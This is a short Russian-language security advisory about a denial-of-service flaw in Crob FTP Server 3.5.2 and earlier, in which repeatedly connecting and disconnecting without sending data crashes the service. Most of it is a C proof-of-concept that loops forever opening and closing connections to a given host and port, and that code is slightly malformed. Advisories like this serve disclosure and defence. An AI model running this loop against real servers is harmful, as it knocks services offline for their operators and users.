Security Lab

Отказ в обслуживании против Crob FTP Server

Дата публикации:15.02.2004
Всего просмотров:1329
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Crob FTP Server 3.5.2 и более ранние версии

Описание: Отказ в обслуживании обнаружен в Crob FTP Server. Удаленный пользователь может аварийно завершить работу FTP службы.

Удаленный пользователь может подключиться и отключится от FTP сервера, не посылая каких либо данных, чтобы аварийно завершить работу FTP демога.

Пример/Эксплоит:

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(int argc, char *argv[])
 

	int s;
	struct sockaddr_in target;

	if(argc < 2)
	{
		printf("Usage: %s HOST [PORT]\n\n",argv[0]);
		return 0;
	}

	do
	{
	s = socket(AF_INET, SOCK_STREAM, 0);
	target.sin_family = AF_INET;
	target.sin_port = htons(atoi(argv[2]));
	target.sin_addr.s_addr = inet_addr(argv[1]);

	printf("-	connecting...\n");

	if( connect(s,(struct sockaddr*)&target, sizeof(struct sockaddr))<0)
	{
		printf("	connect() error!\n\n");
		exit(-1);
	}

	printf("	connected\n");
	printf("	closing connection\n");
	close(s);
	}
	while(1);
	return 0;
 
/*******************************/

URL производителя: http://www.crob.net/studio/ftpserver/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: crob ftpd Denial of Service